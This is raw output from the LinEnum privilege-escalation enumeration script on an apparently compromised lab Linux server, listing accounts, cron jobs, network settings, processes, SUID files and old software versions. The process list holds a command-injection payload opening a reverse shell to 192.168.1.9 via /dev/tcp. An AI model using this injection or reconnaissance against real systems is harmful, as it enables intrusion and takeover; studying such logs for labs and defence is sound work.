halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash


[-] Super user account(s):
root


[-] Are permissions on /home directories lax:
total 24K
drwxr-xr-x   4 root   root   4.0K Oct 12  2009 .
drwxr-xr-x  23 root   root   4.0K Dec 18 23:24 ..
drwx------   2 harold harold 4.0K Oct 12  2009 harold
drwx------   2 john   john   4.0K Oct  8  2009 john


### ENVIRONMENTAL #######################################
[-] Environment information:
CONSOLE=/dev/console
SELINUX_INIT=YES
TERM=linux
INIT_VERSION=sysvinit-2.85
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
runlevel=3
RUNLEVEL=3
PWD=/tmp
LANG=en_US.UTF-8
previous=N
PREVLEVEL=N
SHLVL=5
HOME=/
_=/bin/env


[-] SELinux seems to be present:
SELinux status:		disabled


[-] Path information:
/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
drwxr-xr-x  2 root root  4096 Oct  7  2009 /bin
drwxr-xr-x  2 root root 12288 Oct  7  2009 /sbin
drwxr-xr-x  2 root root 36864 Oct  9  2009 /usr/bin
drwxr-xr-x  2 root root 12288 Oct  8  2009 /usr/sbin
drwxr-xr-x  2 root root  4096 Oct  7  2009 /usr/X11R6/bin


[-] Available shells:
/bin/sh
/bin/bash
/sbin/nologin
/bin/ash
/bin/bsh
/bin/ksh
/usr/bin/ksh
/usr/bin/pdksh
/bin/tcsh
/bin/csh
/bin/zsh


[-] Current umask value:
u=rwx,g=rx,o=rx
0022


[-] Password and storage information:
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7


### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r--  1 root root    0 Oct  7  2009 /etc/cron.deny
-rw-r--r--  1 root root  255 Feb 21  2005 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x   2 root root  4096 Jul 12  2006 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..

/etc/cron.daily:
total 108
drwxr-xr-x   2 root root  4096 Oct  7  2009 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..
lrwxrwxrwx   1 root root    28 Oct  7  2009 00-logwatch -> ../log.d/scripts/logwatch.pl
-rwxr-xr-x   1 root root   418 Sep 14  2006 00-makewhatis.cron
-rwxr-xr-x   1 root root   135 Feb 21  2005 00webalizer
-rwxr-xr-x   1 root root   276 Feb 21  2005 0anacron
-rw-r--r--   1 root root   797 Feb 21  2005 certwatch
-rwxr-xr-x   1 root root   180 Oct 20  2006 logrotate
-rwxr-xr-x   1 root root  2133 Dec  1  2004 prelink
-rwxr-xr-x   1 root root   104 May  4  2007 rpm
-rwxr-xr-x   1 root root   121 Aug 21  2005 slocate.cron
-rwxr-xr-x   1 root root   286 Feb 21  2005 tmpwatch
-rwxr-xr-x   1 root root   158 May  5  2007 yum.cron

/etc/cron.hourly:
total 24
drwxr-xr-x   2 root root  4096 Feb 21  2005 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..

/etc/cron.monthly:
total 32
drwxr-xr-x   2 root root  4096 Oct  7  2009 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..
-rwxr-xr-x   1 root root   278 Feb 21  2005 0anacron

/etc/cron.weekly:
total 48
drwxr-xr-x   2 root root  4096 Oct  7  2009 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..
-rwxr-xr-x   1 root root   414 Sep 14  2006 00-makewhatis.cron
-rwxr-xr-x   1 root root   277 Feb 21  2005 0anacron
-rwxr-xr-x   1 root root    90 May  5  2007 yum.cron


[-] Crontab contents:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly


[-] Anacron jobs and associated file permissions:
-rw-r--r--  1 root root 329 Feb 21  2005 /etc/anacrontab
# /etc/anacrontab: configuration file for anacron

# See anacron(8) and anacrontab(5) for details.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

1	65	cron.daily		run-parts /etc/cron.daily
7	70	cron.weekly		run-parts /etc/cron.weekly
30	75	cron.monthly		run-parts /etc/cron.monthly


[-] When were jobs last executed (/var/spool/anacron contents):
total 28
drwxr-xr-x   2 root root 4096 Oct  7  2009 .
drwxr-xr-x  14 root root 4096 Oct  7  2009 ..
-rw-------   1 root root    9 Oct 12  2009 cron.daily
-rw-------   1 root root    9 Oct  7  2009 cron.monthly
-rw-------   1 root root    9 Oct 11  2009 cron.weekly


### NETWORKING  ##########################################
[-] Network and IP info:
eth0      Link encap:Ethernet  HWaddr 00:0C:29:13:53:6F  
          inet addr:192.168.1.10  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe13:536f/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:483 errors:0 dropped:0 overruns:0 frame:0
          TX packets:266 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:94501 (92.2 KiB)  TX bytes:35907 (35.0 KiB)
          Interrupt:177 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:173 errors:0 dropped:0 overruns:0 frame:0
          TX packets:173 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:12722 (12.4 KiB)  TX bytes:12722 (12.4 KiB)

sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)


[-] ARP history:
kali.domain.name (192.168.1.9) at 00:00:00:00:00:00 [ether] on eth0
RTK_GW.domain.name (192.168.1.1) at 00:00:00:00:00:00  [ether] on eth0


[-] Nameserver(s):
nameserver 192.168.1.1
nameserver 1.1.1.1
nameserver 8.8.8.8


[-] Default route:
default         RTK_GW.domain.n 0.0.0.0         UG    0      0        0 eth0


[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 0.0.0.0:646                 0.0.0.0:*                   LISTEN      -                   
tcp        0      0 0.0.0.0:3306                0.0.0.0:*                   LISTEN      -                   
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      -                   
tcp        0      0 0.0.0.0:631                 0.0.0.0:*                   LISTEN      -                   
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      -                   
tcp        0      0 :::80                       :::*                        LISTEN      3835/sh             
tcp        0      0 :::22                       :::*                        LISTEN      -                   
tcp        0      0 :::443                      :::*                        LISTEN      3835/sh             


[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
udp        0      0 0.0.0.0:640                 0.0.0.0:*                               -                   
udp        0      0 0.0.0.0:643                 0.0.0.0:*                               -                   
udp        0      0 0.0.0.0:68                  0.0.0.0:*                               -                   
udp        0      0 0.0.0.0:111                 0.0.0.0:*                               -                   
udp        0      0 0.0.0.0:631                 0.0.0.0:*                               -                   


### SERVICES #############################################
[-] Running processes:
USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
root         1  0.2  0.4  1976  544 ?        S    23:23   0:02 init [3]                                   
root         2  0.0  0.0     0    0 ?        SN   23:23   0:00 [ksoftirqd/0]
root         3  0.0  0.0     0    0 ?        S<   23:23   0:00 [events/0]
root         4  0.0  0.0     0    0 ?        S<   23:23   0:00 [khelper]
root         5  0.0  0.0     0    0 ?        S<   23:23   0:00 [kacpid]
root        82  0.0  0.0     0    0 ?        S<   23:23   0:00 [kblockd/0]
root        83  0.0  0.0     0    0 ?        S    23:23   0:00 [khubd]
root       100  0.0  0.0     0    0 ?        S    23:23   0:00 [pdflush]
root       101  0.0  0.0     0    0 ?        S    23:23   0:00 [pdflush]
root       102  0.0  0.0     0    0 ?        S    23:23   0:00 [kswapd0]
root       103  0.0  0.0     0    0 ?        S<   23:23   0:00 [aio/0]
root       249  0.0  0.0     0    0 ?        S    23:23   0:00 [kseriod]
root       482  0.0  0.0     0    0 ?        S<   23:23   0:00 [ata/0]
root       483  0.0  0.0     0    0 ?        S<   23:23   0:00 [ata_aux]
root       498  0.0  0.0     0    0 ?        S    23:23   0:00 [kjournald]
root      1745  0.0  0.3  3272  440 ?        S<s  23:23   0:00 udevd
root      1777  0.0  0.0     0    0 ?        S    23:23   0:00 [shpchpd_event]
root      1862  0.0  0.0     0    0 ?        S<   23:23   0:00 [kauditd]
root      1974  0.0  0.0     0    0 ?        S    23:24   0:00 [kjournald]
root      2534  0.0  0.4  1564  540 ?        Ss   23:24   0:00 syslogd -m 0
root      2538  0.0  0.3  2340  384 ?        Ss   23:24   0:00 klogd -x
rpc       2565  0.0  0.4  2400  540 ?        Ss   23:24   0:00 portmap
rpcuser   2584  0.0  0.6  2984  820 ?        Ss   23:24   0:00 rpc.statd
root      2610  0.0  0.2  5844  372 ?        Ss   23:24   0:00 rpc.idmapd
root      2682  0.0  0.3  3472  444 ?        Ss   23:24   0:00 /usr/sbin/acpid
root      2691  0.0  1.7  8320 2208 ?        Ss   23:24   0:00 cupsd
root      2743  0.0  0.8  5808 1124 ?        Ss   23:24   0:00 /usr/sbin/sshd
root      2779  0.0  0.6  3196  768 ?        Ss   23:24   0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
root      2797  0.0  1.4  8348 1860 ?        Ss   23:24   0:00 sendmail: accepting connections
smmsp     2806  0.0  1.2  7200 1628 ?        Ss   23:24   0:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
root      2816  0.0  0.2  2316  348 ?        Ss   23:24   0:00 gpm -m /dev/input/mice -t imps2
root      2825  0.0  0.7  4724  936 ?        Ss   23:24   0:00 crond
xfs       2847  0.0  1.0  3992 1300 ?        Ss   23:24   0:00 xfs -droppriv -daemon
root      2856  0.0  0.4  2280  504 ?        SNs  23:24   0:00 anacron -s
root      2864  0.0  0.3  3108  424 ?        Ss   23:24   0:00 /usr/sbin/atd
dbus      2873  0.0  0.6  3432  804 ?        Ss   23:24   0:00 dbus-daemon-1 --system
root      2882  0.0  4.5  8280 5764 ?        Ss   23:24   0:00 hald
root      3137  0.0  0.4  3256  596 ?        Ss   23:24   0:00 dhclient
root      3139  0.0  7.0 20416 8860 ?        Ss   23:24   0:00 httpd
root      3165  0.0  0.9  5852 1236 ?        S    23:24   0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --err-log=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid
mysql     3207  0.0 14.6 125668 18424 ?      Sl   23:24   0:00 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --socket=/var/lib/mysql/mysql.sock
apache    3212  0.0  4.5 20548 5776 ?        S    23:24   0:00 httpd
apache    3213  0.0  3.9 20416 4920 ?        S    23:24   0:00 httpd
apache    3214  0.0  4.5 20560 5776 ?        S    23:24   0:00 httpd
apache    3215  0.0  4.2 20416 5388 ?        S    23:24   0:00 httpd
apache    3216  0.0  4.2 20416 5388 ?        S    23:24   0:00 httpd
apache    3217  0.0  3.4 20416 4296 ?        S    23:24   0:00 httpd
apache    3218  0.0  4.2 20416 5376 ?        S    23:24   0:00 httpd
apache    3219  0.0  4.2 20420 5324 ?        S    23:24   0:00 httpd
root      3237  0.0  0.3  3304  384 tty1     Ss+  23:24   0:00 /sbin/mingetty tty1
root      3238  0.0  0.3  2500  388 tty2     Ss+  23:24   0:00 /sbin/mingetty tty2
root      3239  0.0  0.3  3164  388 tty3     Ss+  23:24   0:00 /sbin/mingetty tty3
root      3240  0.0  0.3  1932  388 tty4     Ss+  23:24   0:00 /sbin/mingetty tty4
root      3241  0.0  0.3  2772  388 tty5     Ss+  23:24   0:00 /sbin/mingetty tty5
root      3242  0.0  0.3  2776  384 tty6     Ss+  23:24   0:00 /sbin/mingetty tty6
apache    3835  0.0  0.8  4912 1124 ?        S    23:33   0:00 sh -c ping -c 3 127.0.0.1; bash -i >& /dev/tcp/192.168.1.9/9001 0>&1
apache    3837  0.0  1.0  4684 1332 ?        S    23:33   0:00 bash -i
apache    3845  0.0  1.1  4912 1420 ?        S    23:36   0:00 bash ./LinEnum.sh
apache    3846  0.0  0.6  4944  864 ?        R    23:36   0:00 bash ./LinEnum.sh
apache    3848  0.0  0.3  5480  452 ?        S    23:36   0:00 tee -a
apache    3849  0.3  0.3  4376  452 ?        S    23:36   0:00 tee report.txt
apache    4046  0.0  0.6  4944  808 ?        S    23:36   0:00 bash ./LinEnum.sh
apache    4047  0.0  0.6  4152  792 ?        R    23:36   0:00 ps aux


[-] Process binaries and associated permissions (from above list):
lrwxrwxrwx  1 root root       4 Oct  7  2009 /bin/sh -> bash
-rwxr-xr-x  1 root root   12772 Feb 21  2005 /sbin/mingetty
-rwxr-xr-x  1 root root 6036288 Jul 25  2008 /usr/libexec/mysqld
-rwxr-x---  1 root root   22540 Feb 21  2005 /usr/sbin/acpid
-rwxr-xr-x  1 root root   19544 Apr 26  2006 /usr/sbin/atd
-rwxr-xr-x  1 root root  313008 May  2  2007 /usr/sbin/sshd


[-] Contents of /etc/xinetd.conf:
#
# Simple configuration file for xinetd
#
# Some defaults, and include /etc/xinetd.d/

defaults
{
	instances               = 60
        log_type                = SYSLOG authpriv
        log_on_success		= HOST PID
        log_on_failure		= HOST
	cps			= 25 30
}

includedir /etc/xinetd.d


[-] /etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below:
total 144
drwxr-xr-x   2 root root  4096 Oct  7  2009 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..
-rw-r--r--   1 root root   563 Aug 21  2005 chargen
-rw-r--r--   1 root root   580 Aug 21  2005 chargen-udp
-rwxr-xr-x   1 root root   239 May  3  2007 cups-lpd
-rw-r--r--   1 root root   419 Aug 21  2005 daytime
-rw-r--r--   1 root root   438 Aug 21  2005 daytime-udp
-rw-r--r--   1 root root   341 Aug 21  2005 echo
-rw-r--r--   1 root root   360 Aug 21  2005 echo-udp
-rw-r--r--   1 root root   323 May  3  2007 eklogin
-rw-r--r--   1 root root   326 May  3  2007 gssftp
-rw-r--r--   1 root root   310 May  3  2007 klogin
-rw-r--r--   1 root root   323 May  3  2007 krb5-telnet
-rw-r--r--   1 root root   308 May  3  2007 kshell
-rw-r--r--   1 root root   317 Feb 21  2005 rsync
-rw-r--r--   1 root root   497 Aug 21  2005 time
-rw-r--r--   1 root root   518 Aug 21  2005 time-udp


[-] /etc/init.d/ binary permissions:
lrwxrwxrwx  1 root root 11 Oct  7  2009 /etc/init.d -> rc.d/init.d


[-] /etc/rc.d/init.d binary permissions:
total 712
drwxr-xr-x   2 root root     4096 Oct  8  2009 .
drwxr-xr-x  10 root root     4096 Oct  7  2009 ..
-rwxr-xr-x   1 root root     1128 Feb 21  2005 acpid
-rwxr-xr-x   1 root root      834 Feb 21  2005 anacron
-rwxr-xr-x   1 root root     1429 Feb 21  2005 apmd
-rwxr-xr-x   1 root root     4404 Feb 21  2005 arptables_jf
-rwxr-xr-x   1 root root     1176 Apr 26  2006 atd
-rwxr-xr-x   1 root root     2781 May  2  2007 auditd
-rwxr-xr-x   1 root root    16544 May  3  2007 autofs
-rwxr-xr-x   1 root root     1368 Feb 21  2005 bluetooth
-rwxr-xr-x   1 root root     1355 May  2  2007 cpuspeed
-rwxr-xr-x   1 root root     1904 Jul 12  2006 crond
-rwxr-xr-x   1 root root     2312 May  3  2007 cups
-rwxr-xr-x   1 root root     1502 Feb 21  2005 dc_client
-rwxr-xr-x   1 root root     1344 Feb 21  2005 dc_server
-rwxr-xr-x   1 root root    16898 May  2  2007 diskdump
-rwxr-xr-x   1 root root      968 Feb 21  2005 dund
-rwxr-xr-x   1 root root    10799 Nov 20  2006 functions
-rwxr-xr-x   1 root root     1778 May 17  2006 gpm
-rwxr-xr-x   1 root root     1388 May  2  2007 haldaemon
-rwxr-xr-x   1 root root     6028 Jan 15  2007 halt
-rwxr-xr-x   1 root root     1001 Feb 21  2005 hidd
-rwxr-xr-x   1 root root     3201 May  4  2007 httpd
-rwxr-xr-x   1 root root    13763 May  3  2007 ipmi
-rwxr-xr-x   1 root root     7135 Feb 21  2005 iptables
-rwxr-xr-x   1 root root     1487 Feb 21  2005 irda
-rwxr-xr-x   1 root root     1949 May  2  2007 irqbalance
-rwxr-xr-x   1 root root     6183 Feb 21  2005 isdn
-rwxr-xr-x   1 root root      200 Sep 27  2006 keytable
-rwxr-xr-x   1 root root      652 Sep  3  2003 killall
-rwxr-xr-x   1 root root     2095 May  2  2007 kudzu
-rwxr-xr-x   1 root root     1906 May  5  2007 lvm2-monitor
-rwxr-xr-x   1 root root     1700 May  3  2007 mdmonitor
-rwxr-xr-x   1 root root     1613 May  3  2007 mdmpd
-rwxr-xr-x   1 root root     1746 May  3  2007 messagebus
-rwxr-xr-x   1 root root     1731 May  2  2007 microcode_ctl
-rwxr-xr-x   1 root root     4235 Jul 25  2008 mysqld
-rwxr-xr-x   1 root root    12198 May  2  2007 netdump
-rwxr-xr-x   1 root root     7422 Nov 20  2006 netfs
-rwxr-xr-x   1 root root     1303 May  2  2007 netplugd
-rwxr-xr-x   1 root root     8543 Apr 18  2006 network
-rwxr-xr-x   1 root root     1454 May  3  2007 NetworkManager
-rwxr-xr-x   1 root root     4344 May  3  2007 nfs
-rwxr-xr-x   1 root root     3274 May  3  2007 nfslock
-rwxr-xr-x   1 root root     2171 May  2  2007 nscd
-rwxr-xr-x   1 root root     3586 May  5  2007 ntpd
-rwxr-xr-x   1 root root    17713 May  3  2007 openibd
-rwxr-xr-x   1 root root     1144 Feb 21  2005 pand
-rwxr-xr-x   1 root root     4431 Mar  8  2006 pcmcia
-rwxr-xr-x   1 root root     1877 Feb 21  2005 portmap
-rwxr-xr-x   1 root root     1021 Jan 17  2007 psacct
-rwxr-xr-x   1 root root     2404 Oct 18  2004 rawdevices
-rwxr-xr-x   1 root root     1387 May  2  2007 rdisc
-rwxr-xr-x   1 root root      790 May  2  2007 readahead
-rwxr-xr-x   1 root root      795 May  2  2007 readahead_early
-rwxr-xr-x   1 root root     1777 May  3  2007 rhnsd
-rwxr-xr-x   1 root root     2177 May  3  2007 rpcgssd
-rwxr-xr-x   1 root root     1805 May  3  2007 rpcidmapd
-rwxr-xr-x   1 root root     2153 May  3  2007 rpcsvcgssd
-rwxr-xr-x   1 root root     1547 Feb 21  2005 saslauthd
-rwxr-xr-x   1 root root     3349 May  2  2007 sendmail
-rwxr-xr-x   1 root root     1175 Jul 10  2002 single
-rwxr-xr-x   1 root root     2247 May  2  2007 smartd
-rwxr-xr-x   1 root root     3282 May  4  2007 squid
-rwxr-xr-x   1 root root     3105 May  2  2007 sshd
-rwxr-xr-x   1 root root     1369 Feb 21  2005 syslog
-rwxr-x---   1 root pegasus  2321 Aug 12  2006 tog-pegasus
-rwxr-xr-x   1 root root     2796 Feb 21  2005 tux
-rwxr-xr-x   1 root root     1880 Aug 12  2006 vsftpd
-rwxr-xr-x   1 root root     1548 Feb 15  2007 winbind
-rwxr-xr-x   1 root root     1650 May  2  2007 wpa_supplicant
-rwxr-xr-x   1 root root     3607 May  3  2007 xfs
-rwxr-xr-x   1 root root     2497 Aug 21  2005 xinetd
-rwxr-xr-x   1 root root     2822 May  2  2007 ypbind
-rwxr-xr-x   1 root root     1036 May  5  2007 yum


### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.6.7p5


[-] MYSQL version:
mysql  Ver 14.7 Distrib 4.1.22, for redhat-linux-gnu (i686) using readline 4.3


[-] Apache version:
Server version: Apache/2.0.52
Server built:   May  4 2007 06:25:03


### INTERESTING FILES ####################################
[-] Useful file locations:
/usr/bin/wget
/usr/bin/nmap
/usr/bin/gcc
/usr/bin/curl


[-] Can we read/write sensitive files:
-rw-r--r--  1 root root 1772 Oct 12  2009 /etc/passwd
-rw-r--r--  1 root root 638 Oct 12  2009 /etc/group
-rw-r--r--  1 root root 842 May 24  2004 /etc/profile
-r--------  1 root root 1141 Oct 12  2009 /etc/shadow


[-] SUID files:
-r-sr-xr-x  1 root root 46076 May  2  2007 /sbin/unix_chkpwd
-r-s--x--x  1 root root 20016 May  2  2007 /sbin/pam_timestamp_check
-r-sr-xr-x  1 root root 301242 May  2  2007 /sbin/pwdb_chkpwd
-rwsr-xr-x  1 root root 6096 May  2  2007 /usr/sbin/ccreds_validate
-rws--x--x  1 root root 30760 May  2  2007 /usr/sbin/userhelper
-rwsr-xr-x  1 root root 6668 Feb 21  2005 /usr/sbin/userisdnctl
-r-s--x---  1 root apache 10760 May  4  2007 /usr/sbin/suexec
-rwsr-xr-x  1 root root 15228 May  3  2007 /usr/sbin/usernetctl
-rws--x--x  1 root root 434644 May  2  2007 /usr/libexec/openssh/ssh-keysign
-rwsr-xr-x  1 root root 7396 May  2  2007 /usr/libexec/pt_chown
-rwsr-xr-x  1 root root 123961 May  3  2007 /usr/kerberos/bin/ksu
-rwsr-x---  1 root squid 9952 May  4  2007 /usr/lib/squid/pam_auth
-rwsr-x---  1 root squid 10208 May  4  2007 /usr/lib/squid/ncsa_auth
-rws--x--x  1 root root 18392 May  3  2007 /usr/bin/chsh
-rwsr-xr-x  1 root root 17304 May 10  2006 /usr/bin/rcp
---s--x--x  1 root root 93816 Aug 21  2005 /usr/bin/sudo
-rwsr-xr-x  1 root root 117802 May  2  2007 /usr/bin/chage
-rwsr-xr-x  1 root root 82772 Jul 12  2006 /usr/bin/crontab
-rwsr-xr-x  1 root root 12312 May 10  2006 /usr/bin/rlogin
-rwsr-xr-x  1 root root 8692 May 10  2006 /usr/bin/rsh
-rwsr-xr-x  1 root root 131181 May  2  2007 /usr/bin/gpasswd
-rwsr-xr-x  1 root root 42280 Apr 26  2006 /usr/bin/at
-rws--x--x  1 root root 7700 May  3  2007 /usr/bin/newgrp
-rws--x--x  1 root root 17708 May  3  2007 /usr/bin/chfn
-rwsr-xr-x  1 root root 19597 May  3  2007 /usr/bin/lppasswd
-rwsr-xr-x  1 root root 72261 May  2  2007 /usr/bin/sg
-r-s--x--x  1 root root 21200 Aug 21  2005 /usr/bin/passwd
-rwsr-xr-x  1 root root 87016 May  3  2007 /bin/mount
-rwsr-xr-x  1 root root 12300 May  2  2007 /bin/traceroute6
-rwsr-xr-x  1 root root 23844 Nov 23  2006 /bin/traceroute
-rwsr-xr-x  1 root root 53612 May  3  2007 /bin/umount
-rwsr-xr-x  1 root root 30924 May  2  2007 /bin/ping6
-rwsr-xr-x  1 root root 33272 May  2  2007 /bin/ping
-rwsr-xr-x  1 root root 61168 May  5  2007 /bin/su


[-] SGID files:
-rwxr-Sr-t  1 root root 1733 Feb  9  2012 /var/www/html/index.php
-rwxr-Sr-t  1 root root 199 Oct  8  2009 /var/www/html/pingit.php
-rwxr-sr-x  1 root root 11367 May  3  2007 /sbin/netreport
-rwxr-sr-x  1 root lock 15372 Apr  4  2006 /usr/sbin/lockdev
-rwxr-sr-x  1 root smmsp 746328 May  2  2007 /usr/sbin/sendmail.sendmail
-rwxr-sr-x  1 root utmp 10497 Feb 21  2005 /usr/sbin/utempter
-r-xr-sr-x  1 root tty 9752 May  5  2007 /usr/bin/wall
-rwxr-sr-x  1 root slocate 38548 Aug 21  2005 /usr/bin/slocate
-rwxr-sr-x  1 root mail 14636 Feb 21  2005 /usr/bin/lockfile
-rwxr-sr-x  1 root tty 10124 May  3  2007 /usr/bin/write
-rwxr-sr-x  1 root nobody 57932 May  2  2007 /usr/bin/ssh-agent


[+] Possibly interesting SGID files:
-rwxr-Sr-t  1 root root 1733 Feb  9  2012 /var/www/html/index.php
-rwxr-Sr-t  1 root root 199 Oct  8  2009 /var/www/html/pingit.php


[-] NFS config details:
-rw-r--r--  1 root root 0 Jan 12  2000 /etc/exports


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r--  1 root root 694 Feb 21  2005 /etc/syslog.conf
-rw-r--r--  1 root root 401 May  5  2007 /etc/yum.conf
-rwxr-xr-x  1 root root 1484 Jan  1  2006 /etc/request-key.conf
-rw-r--r--  1 root root 10 Oct  7  2009 /etc/pam_smb.conf
-rw-r--r--  1 root root 1623 Oct  7  2009 /etc/nsswitch.conf
-rw-r--r--  1 root root 658 May  3  2007 /etc/initlog.conf
-rw-r--r--  1 root root 216 May  3  2007 /etc/sestatus.conf
-rw-r--r--  1 root root 28 May  2  2007 /etc/ld.so.conf
-rw-r--r--  1 root root 3243 Feb 21  2005 /etc/lftp.conf
-rw-r--r--  1 root root 10814 Feb 20  2006 /etc/ltrace.conf
-rw-r--r--  1 root root 23735 Feb 21  2005 /etc/webalizer.conf
-rw-r--r--  1 root root 604 May  3  2007 /etc/sysctl.conf
-rw-r--r--  1 root root 585 Oct  7  2009 /etc/yp.conf
-rw-r--r--  1 root root 1895 May  2  2007 /etc/nscd.conf
-rw-r--r--  1 root root 3058 Oct  7  2009 /etc/smartd.conf
-rw-r-----  1 root root 450 May  2  2007 /etc/auditd.conf
-rw-r--r--  1 root root 117 Dec 18 23:24 /etc/resolv.conf
-rw-r--r--  1 root root 23488 Feb 21  2005 /etc/jwhois.conf
-rw-r--r--  1 root root 134 May  2  2007 /etc/pwdb.conf
-rw-r--r--  1 root root 2281 Oct  7  2009 /etc/krb.conf
-rw-r--r--  1 root root 296 Aug 21  2005 /etc/updatedb.conf
-rw-r--r--  1 root root 833 Aug 13  2006 /etc/gssapi_mech.conf
-rw-r--r--  1 root root 505 Oct 20  2006 /etc/logrotate.conf
-rw-r--r--  1 root root 17 Jul 23  2000 /etc/host.conf
-rw-r--r--  1 root root 2657 May  2  2007 /etc/warnquota.conf
-rw-r--r--  1 root root 615 Oct  7  2009 /etc/krb5.conf
-rw-r--r--  1 root root 759 Jun  1  2009 /etc/pear.conf
-rw-r--r--  1 root root 153 Feb 21  2005 /etc/esd.conf
-rw-r--r--  1 root root 1983 Feb 21  2005 /etc/mtools.conf
-rw-r--r--  1 root root 463 May  2  2007 /etc/cpuspeed.conf
-rw-r--r--  1 root root 2374 Oct  7  2009 /etc/libuser.conf
-rw-r--r--  1 root root 2434 May  5  2007 /etc/ntp.conf
-rw-r--r--  1 root root 821 Oct  1  2004 /etc/prelink.conf
-rw-r--r--  1 root root 1756 May 17  2006 /etc/gpm-root.conf
-rw-r--r--  1 root root 177 May  3  2007 /etc/idmapd.conf
-rw-r--r--  1 root root 0 Feb 21  2005 /etc/wvdial.conf
-rw-r--r--  1 root root 8738 Oct  7  2009 /etc/ldap.conf
-rw-r--r--  1 root root 51 Oct 12  2009 /etc/modprobe.conf
-rw-r--r--  1 root root 289 Aug 21  2005 /etc/xinetd.conf


[-] Location and Permissions (if accessible) of .bak file(s):
-r--r--r--  1 root root 1243 Aug 16  2003 /usr/lib/perl5/vendor_perl/5.8.5/i386-linux-thread-multi/Filter/exec.pm.bak
-r--r--r--  1 root root 1471 Aug 16  2003 /usr/lib/perl5/vendor_perl/5.8.5/i386-linux-thread-multi/Filter/sh.pm.bak
-r--r--r--  1 root root 2181 Aug 16  2003 /usr/lib/perl5/vendor_perl/5.8.5/i386-linux-thread-multi/Filter/cpp.pm.bak
